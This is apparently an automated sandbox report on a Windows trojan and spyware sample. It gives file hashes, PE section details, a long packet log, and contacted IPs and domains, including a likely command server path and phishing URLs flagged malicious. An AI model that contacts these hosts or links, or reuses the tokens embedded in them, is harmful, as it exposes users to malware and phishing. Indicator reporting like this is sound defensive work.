34.226.108.155 | httpbin.org | United States | 14618 | AMAZON-AESUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1578893
Start date and time: 2024-12-20 16:18:39 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 9s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 5
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: 5Jat5RkD3a.exe (renamed because the original name is a hash value)
Original Sample Name: 8c39c06251f42e3b7ebc710fe06753aa.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@1/0@6/2
EGA Information:
• Successful, ratio: 100%
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Stop behavior analysis, all processes terminated
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 20.12.23.50
• Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
10:19:55 | API Interceptor | 3x Sleep call for process: 5Jat5RkD3a.exe modified
Joe Sandbox View / Context: IPs (Match | Associated Sample Name / URL | Detection | Threat Name | Context)
185.121.15.192 | u57m8aCdwb.exe | malicious | Unknown | home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
185.121.15.192 | TnIhoWAr57.exe | malicious | Clipboard Hijacker, Cryptbot | home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
185.121.15.192 | file.exe | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRAT | home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851?argument=TmUWwkAQBKXXTWTE1734696758
34.226.108.155 | file.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer |
34.226.108.155 | file.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer |
34.226.108.155 | file.exe | malicious | NetSupport RAT, LummaC, Amadey, LummaC Stealer |
34.226.108.155 | s3hvuz3XS0.exe | malicious | Cryptbot |
34.226.108.155 | 65AcuGF7W7.exe | malicious | Cryptbot |
34.226.108.155 | UYJ0oreVew.exe | malicious | Unknown |
34.226.108.155 | NWKk493xTy.exe | malicious | Clipboard Hijacker, Cryptbot |
34.226.108.155 | 88S3zQTYpl.exe | malicious | Clipboard Hijacker, Cryptbot |
34.226.108.155 | file.exe | malicious | LummaC, Amadey, LummaC Stealer, RHADAMANTHYS, Xmrig |
34.226.108.155 | file.exe | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, PureLog Stealer, Stealc |
Joe Sandbox View / Context: Domains (Match | Associated Sample Name / URL | Detection | Threat Name | Context)
httpbin.org | u57m8aCdwb.exe | malicious | Unknown | 98.85.100.80
httpbin.org | TnIhoWAr57.exe | malicious | Clipboard Hijacker, Cryptbot | 98.85.100.80
httpbin.org | file.exe | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRAT | 34.226.108.155
httpbin.org | file.exe | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRAT | 98.85.100.80
httpbin.org | file.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer | 34.226.108.155
httpbin.org | file.exe | malicious | LummaC, Amadey, LummaC Stealer | 98.85.100.80
httpbin.org | file.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer | 34.226.108.155
httpbin.org | file.exe | malicious | NetSupport RAT, LummaC, Amadey, LummaC Stealer | 34.226.108.155
httpbin.org | file.exe | malicious | ScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar | 98.85.100.80
httpbin.org | Tii6ue74NB.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, Stealc, Vidar | 98.85.100.80
home.twentytk20ht.top | u57m8aCdwb.exe | malicious | Unknown | 185.121.15.192
home.twentytk20ht.top | TnIhoWAr57.exe | malicious | Clipboard Hijacker, Cryptbot | 185.121.15.192
Joe Sandbox View / Context: ASNs (Match | Associated Sample Name / URL | Detection | Threat Name | Context)
REDSERVICIOES | u57m8aCdwb.exe | malicious | Unknown | 185.121.15.192
REDSERVICIOES | TnIhoWAr57.exe | malicious | Clipboard Hijacker, Cryptbot | 185.121.15.192
REDSERVICIOES | file.exe | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRAT | 185.121.15.192
REDSERVICIOES | http://blacksaltys.com | malicious | Unknown | 185.121.15.137
REDSERVICIOES | IGz.arm7.elf | malicious | Mirai | 185.189.98.142
REDSERVICIOES | https://agradeahead.com/ | malicious | Unknown | 185.121.15.137
REDSERVICIOES | http://productfocus.com | malicious | Unknown | 185.121.15.137
REDSERVICIOES | https://objmapper.com/CtmE0s2ZteC8BuQLNprxjCPB8gAgAcIi7niu-9oX3Q2e | malicious | Unknown |
                                                            • 185.121.15.137
                                                            hax.mips.elfGet hashmaliciousMiraiBrowse
                                                            • 185.226.106.144
                                                            la.bot.mipsel.elfGet hashmaliciousMiraiBrowse
                                                            • 178.19.44.184
                                                            AMAZON-AESUShttps://postoffice.adobe.com/po-server/link/redirect?target=eyJhbGciOiJIUzUxMiJ9.eyJ0ZW1wbGF0ZSI6ImNjX2NvbGxhYl9kY3NoYXJpbmdfdmlld19lbWFpbCIsImVtYWlsQWRkcmVzcyI6ImJyaWFuLmh1dGNoaW5zQHJpdmVycm9jay5jb20iLCJyZXF1ZXN0SWQiOiJhYzIxMDNjZS03NDZkLTRmMTctNjBkYi00MzM5OWU3NzU5NGEiLCJsaW5rIjoiaHR0cHM6Ly9hY3JvYmF0LmFkb2JlLmNvbS9pZC91cm46YWFpZDpzYzpWQTZDMjplOTgwMjRmZi03NGRmLTRlNjctYjJkZi0wNWY0NTk4MTc4OWUiLCJsYWJlbCI6IjExIiwibG9jYWxlIjoicHRfQlIifQ.GzFDC4sqpVLEAHwIPLSleF4_d0iUGb4--dg-spPTHWsUGjt086-aN6bs1cEm-BfvTqQu97RqT5NU-RFwvTkvTAGet hashmaliciousUnknownBrowse
                                                            • 3.236.206.93
                                                            arm5.elfGet hashmaliciousMiraiBrowse
                                                            • 54.7.169.53
                                                            arm7.elfGet hashmaliciousMiraiBrowse
                                                            • 18.214.183.17
                                                            nsharm.elfGet hashmaliciousMiraiBrowse
                                                            • 15.177.209.179
                                                            tmp.zipGet hashmaliciousUnknownBrowse
                                                            • 52.0.145.89
                                                            https://alphaarchitect.com/2024/12/long-term-expected-returns/Get hashmaliciousUnknownBrowse
                                                            • 3.225.89.177
                                                            http://url4908.dhlecommerce.co.uk/ls/click?upn=u001.X2rfUT-2B51P1nILh8ZMtd4zxSiOlaeCaJtVhZupM-2F9LVEom-2B2QjKW7VcxuhsgKUeKnIPI_ewjtI2P4e42WCeQ3lgulQYJHXxC-2BKEQd0RqJfZdimIQiEcg5K71uNDU3wpKab4YU06GJXEZw9euxGD1hXreQRtHviPlL-2BsigHUpj3RYaHOJ-2FpfiIYtW5UZW-2FL-2BsfGEF-2Fu3A-2Bkin-2FRABSBeyYYIziUnz7H5jv9BuAlxlqnrkK7Xb-2BSSeTcIF0qb4hFEFWpSrypfKJHyCgl3tbBDsclBEPKsRVdEpjy6Dwgd1VZBghtqeTmGJ311VYG2rlnLwf52rNmVt0FUWd8IYzZVJADPK4JWoWP-2FevdRAolnQn3jiyaPa-2FoGFukWqUg1oi4mOa5JSgRM9klq2vHbg6hrhBgclPYZMSvATsKsPKxozGI6BjIj7xrP4YD2dZONVrYcGI5H8pGet hashmaliciousHTMLPhisherBrowse
                                                            • 52.21.33.16
                                                            https://click.pstmrk.it/3s/veed.io%2Fshare-video-link%3Ftoken%3DeyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE3MzQ2MzE2NDgsImlhdCI6MTczNDYzMDc0OCwic3ViIjoiZmY0NTdiM2MtYjI3MC00YzA0LWEwOTEtYjY3ZDJkOGQ3ZTU1Iiwicm9sZXMiOltdLCJraWQiOiJwcm9qZWN0cy92ZWVkLXByb2Qtc2VydmVyL2xvY2F0aW9ucy9ldXJvcGUtd2VzdDEva2V5UmluZ3MvdmVlZC1wcm9kLWtleXJpbmcvY3J5cHRvS2V5cy92ZWVkLXByb2QtandrLWtleS9jcnlwdG9LZXlWZXJzaW9ucy8xIiwiZmVhdHVyZXMiOnt9LCJzY29wZXMiOltdfQ.f-EtSCYYeQiR4cEb8w5ABF3koXpbxl8QeFIarADkLP6q32DzsnFZl76Y98Uad7M8RBPPuOQOV9SUbCY1hRa4IbqV9_4cTm0v7DuBTCKOZbHN1NiATZOGw2BzdEMqIEfnNo5A_H2_DLVQZLtd6sZzcRoNBzbmcq2_xlzWgmqIErGV0VYXIb-Vac1b-3wmAgIyE-VS7Cd5aHYtVyiV9T5HfrpjPl7-M6dLIaQqm6103z7gO_qoKow1qbFmNgGaUsQED1CHbqo-hCgXzib7NToyu0Qq4kSl-2NEzgLMKy1zFR2J0E0vr9FHirjR9fmmDF2nk76Ht8L2WbV-dRyXZBZaUikfojo56vYWI9cfSQrG_awuFNR0M1s6dpPwumDM8sXlMZYt4u5WZaNcRZynPHXeqNZcdwKhlZrFN0U3B3U7B69avz_FlMxw6Or_0aeJkUP5YZP3wH-IIbwwa6es37u8G7gWYINEfp-pJlKV7klV1CcskLf_53iNx7MtxgvAXLMNZJ2tnuxY8W6w_E-pchjpNP2I5NV2Ui2_bNSgl3kBuX3oWsX0m_wL3MZ39pE3paPp2FAIgQPpZ5a0BhmPYsMk2IPPel2dll8j1IYBwHsZ5a1IHsHA6gTMWkJl-uhAjN4mnXo7Om0NWRZvfFvatgA4YCoTXdntM31GIZxAyWF9a14%26postLoginUrl%3D%252Fview%252F3ab9b7be-178c-4289-b29e-75921856f7f5%252F/oMlP/0SC6AQ/AQ/15f5e010-d260-490a-9e5d-79f5643b5481/1/HSOO9aL291Get hashmaliciousUnknownBrowse
                                                            • 107.22.100.5
                                                            file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC StealerBrowse
                                                            • 34.226.108.155
                                                            https://f.io/nWWUxvn6Get hashmaliciousHTMLPhisherBrowse
                                                            • 52.45.152.88
                                                            No context
                                                            No context
No created / dropped files found
File type: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Entropy (8bit): 7.981576271910101
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• VXD Driver (31/22) 0.00%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: 5Jat5RkD3a.exe
File size: 4'449'280 bytes
MD5: 8c39c06251f42e3b7ebc710fe06753aa
SHA1: cee1dc7963d47a34b22683f42fcd125478a0d586
SHA256: 68d042b3b794b314a80918bf399bafbace6cff82e4d567f9b42f3699d3c44c35
SHA512: a6fdd8cd2065232c558f6fb4abb5c5a6ed7f99e6c355e58de94e5876d6ea59ad3784bec3c944e1de426189c529b8dfefa675e4c755134f4b6086ea33b71b2312
SSDEEP: 98304:l5J8nX6y3j1Hf3xUCcKXsW+Dl4UZ8RBx3YO87I:l56nXBH/iC3XdPUoBxOM
TLSH: 212633F0B2ABC15CDF2DF9F1289199DE52140F236953E26AD9CA221B59D3D8447CCEE0
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....cg...............(.JI..Lu..2...........`I...@...................................D...@... ............................
Icon Hash: 90cececece8e8eb0
Entrypoint: 0x106e000
Entrypoint Section: .taggant
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
DLL Characteristics: DYNAMIC_BASE
Time Stamp: 0x67639807 [Thu Dec 19 03:50:31 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: 2eabe9054cad5152567f0699947a2c5b
Name                                 | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT         | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_IMPORT         | 0x72b05f        | 0x73         | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE       | 0x72a000        | 0x2b0        | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_SECURITY       | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_BASERELOC      | 0xc6be98        | 0x10         | pvfmcbmp
IMAGE_DIRECTORY_ENTRY_DEBUG          | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_TLS            | 0xc6be48        | 0x18         | pvfmcbmp
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG    | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT   | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_IAT            | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT   | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_RESERVED       | 0x0             | 0x0          |
Name     | Virtual Address | Virtual Size | Raw Size | MD5                              | Xored PE | ZLIB Complexity    | File Type            | Entropy            | Characteristics
         | 0x1000          | 0x729000     | 0x283400 | 2a0c12bc3b794f01cad3c230b9c20449 | unknown  | unknown            | unknown              | unknown            | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc    | 0x72a000        | 0x2b0        | 0x200    | 84d5b3f17573b257ccdb2a7a3535bef1 | False    | 0.798828125        | data                 | 6.018377851508956  | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata   | 0x72b000        | 0x1000       | 0x200    | d6de82d14e357527731a70b0d9d5c0e8 | False    | 0.166015625        | data                 | 1.1589685166080708 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
         | 0x72c000        | 0x389000     | 0x200    | 1d1338127d3df5ec4574238b3e2c7ce0 | unknown  | unknown            | unknown              | unknown            | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
pvfmcbmp | 0xab5000        | 0x1b8000     | 0x1b7200 | 6ab7c2693d139608c976872aeda87c25 | False    | 0.9944063789851978 | data                 | 7.95605426603415   | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
qfezismy | 0xc6d000        | 0x1000       | 0x600    | 53cbe08bb58be802a6bbd8993d650974 | False    | 0.6067708333333334 | data                 | 5.288407157046807  | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0xc6e000        | 0x3000       | 0x2200   | a76bfe367d1e8a756437255896161c9d | False    | 0.06571691176470588 | DOS executable (COM) | 0.7663504896487867 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name        | RVA      | Size  | Type                                   | Language | Country | ZLIB Complexity
RT_MANIFEST | 0xc6bea8 | 0x256 | ASCII text, with CRLF line terminators |          |         | 0.5100334448160535
DLL          | Import
kernel32.dll | lstrcpy
                                                            Dec 20, 2024 16:19:56.552597046 CET4970280192.168.2.10185.121.15.192
                                                            Dec 20, 2024 16:19:56.552609921 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.552618980 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.552627087 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.552639008 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.552649021 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.552675962 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.552719116 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.552880049 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.552891970 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.553085089 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.553162098 CET4970280192.168.2.10185.121.15.192
                                                            Dec 20, 2024 16:19:56.553257942 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.553319931 CET4970280192.168.2.10185.121.15.192
                                                            Dec 20, 2024 16:19:56.553369045 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.553379059 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.553386927 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.553411961 CET4970280192.168.2.10185.121.15.192
                                                            Dec 20, 2024 16:19:56.553440094 CET4970280192.168.2.10185.121.15.192
                                                            Dec 20, 2024 16:19:56.553493977 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.553505898 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.553515911 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.553527117 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.553538084 CET4970280192.168.2.10185.121.15.192
                                                            Dec 20, 2024 16:19:56.553570032 CET4970280192.168.2.10185.121.15.192
                                                            Dec 20, 2024 16:19:56.553594112 CET4970280192.168.2.10185.121.15.192
                                                            Dec 20, 2024 16:19:56.553612947 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.553622007 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.553630114 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.553657055 CET4970280192.168.2.10185.121.15.192
                                                            Dec 20, 2024 16:19:56.553682089 CET4970280192.168.2.10185.121.15.192
                                                            Dec 20, 2024 16:19:56.553814888 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.553864956 CET4970280192.168.2.10185.121.15.192
                                                            Dec 20, 2024 16:19:56.554049015 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.554059029 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.554066896 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.554078102 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.554089069 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.554117918 CET4970280192.168.2.10185.121.15.192
                                                            Dec 20, 2024 16:19:56.554207087 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.554214954 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.554332972 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.554342985 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.554352045 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.554362059 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.554617882 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.554627895 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.554636002 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.554645061 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.554655075 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.554802895 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.554812908 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.671499968 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.671513081 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.671601057 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.671611071 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.671619892 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.671760082 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.671770096 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.671778917 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.671788931 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.671801090 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.671874046 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.671884060 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.672060013 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.672070026 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.672077894 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.672117949 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.672175884 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.672185898 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.672291994 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.672303915 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.672314882 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.672629118 CET4970280192.168.2.10185.121.15.192
                                                            Dec 20, 2024 16:19:56.672700882 CET4970280192.168.2.10185.121.15.192
                                                            Dec 20, 2024 16:19:56.672924995 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.672990084 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.673172951 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.673182011 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.673234940 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.673243999 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.673285007 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.673368931 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.673378944 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.673398018 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.673458099 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.673552990 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.673563004 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.673607111 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.673616886 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.673664093 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.673675060 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.673746109 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.673788071 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.673798084 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.673877001 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.673922062 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.673974037 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.674086094 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.674097061 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.674220085 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.674304008 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.674453020 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.674463987 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.674794912 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.674804926 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.674813986 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.674823999 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.674833059 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.675205946 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.675215960 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.675224066 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.675235033 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.676307917 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.676553965 CET4970280192.168.2.10185.121.15.192
                                                            Dec 20, 2024 16:19:56.676616907 CET4970280192.168.2.10185.121.15.192
                                                            Dec 20, 2024 16:19:56.719567060 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.720022917 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.720114946 CET4970280192.168.2.10185.121.15.192
                                                            Dec 20, 2024 16:19:56.720369101 CET4970280192.168.2.10185.121.15.192
                                                            Dec 20, 2024 16:19:56.792572975 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.792588949 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.792599916 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.792609930 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.792705059 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.792714119 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.792831898 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.792843103 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.792982101 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.792992115 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.793000937 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.793011904 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.793083906 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.793138027 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.793148994 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.793232918 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.793246984 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.793256044 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.793318987 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.793329954 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.793395042 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.793406010 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.793415070 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.793426991 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.793530941 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.793543100 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.793551922 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.793589115 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.793598890 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.793786049 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.793795109 CET8049702185.121.15.192192.168.2.10
